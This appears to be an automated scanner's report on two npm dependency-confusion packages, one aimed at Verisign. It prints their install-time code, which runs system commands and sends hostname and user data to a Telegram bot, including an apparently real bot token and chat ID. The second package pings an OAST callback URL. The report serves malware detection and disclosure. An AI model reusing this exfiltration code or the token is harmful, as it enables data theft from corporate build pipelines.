@corpweb-ui/wmkt-library@99.99.11 + a2a-chat-canvas@97.9.9
Two dependency confusion attacks. The first targets Verisign specifically, using version squatting (v99.99.11) and exfiltrating hostname/user data to a Telegram bot with message 'VERISIGN - RCE CONFIRMED'. The second targets an unknown internal package with version squatting (v97.9.9) and pings an OAST callback URL. Both self-declare as 'bug bounty' but execute code on install without consent.
Two packages exploit dependency confusion to execute code on corporate build systems. One targets Verisign specifically and exfiltrates data via Telegram bot.
const cmd = "id && pwd && hostname";
exec(cmd, (error, stdout, stderr) => {
const message = `🚨 *VERISIGN - RCE CONFIRMED* 🚨\n\n📦 *Target:* @corpweb-ui/wmkt-library\n\n📄 *Evidence:*\n\`\`\`\n${evidence}\n\`\`\``;
const token = "8699485977:AAGE6u0cGKTTMuXq3TGjx05YMP8b6FibODs";
const chatId = "1483949647";
const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
https.get(url);
});
Comments in Arabic: "توكن البوت والـ Chat ID بتوعك" (Your bot token and Chat ID)
86994859771483949647node index.jsconst CALLBACK_URL = 'http://dwpmxufjontejuultjhe0dcw571lqawco.oast.fun/';
function sendPing() {
const targetUrl = `${CALLBACK_URL}?host=${encodeURIComponent(hostname)}&poc=dependency_confusion`;
https.get(targetUrl);
}
sendPing();
dwpmxufjontejuultjhe0dcw571lqawco.oast.funnode index.jsBoth self-declare as "bug bounty" / "security research" but execute code on install without consent. Regardless of intent, they run arbitrary code in corporate build pipelines and exfiltrate data to external services.
Detected by: npm-sentinel automated scanner Date: 2026-04-03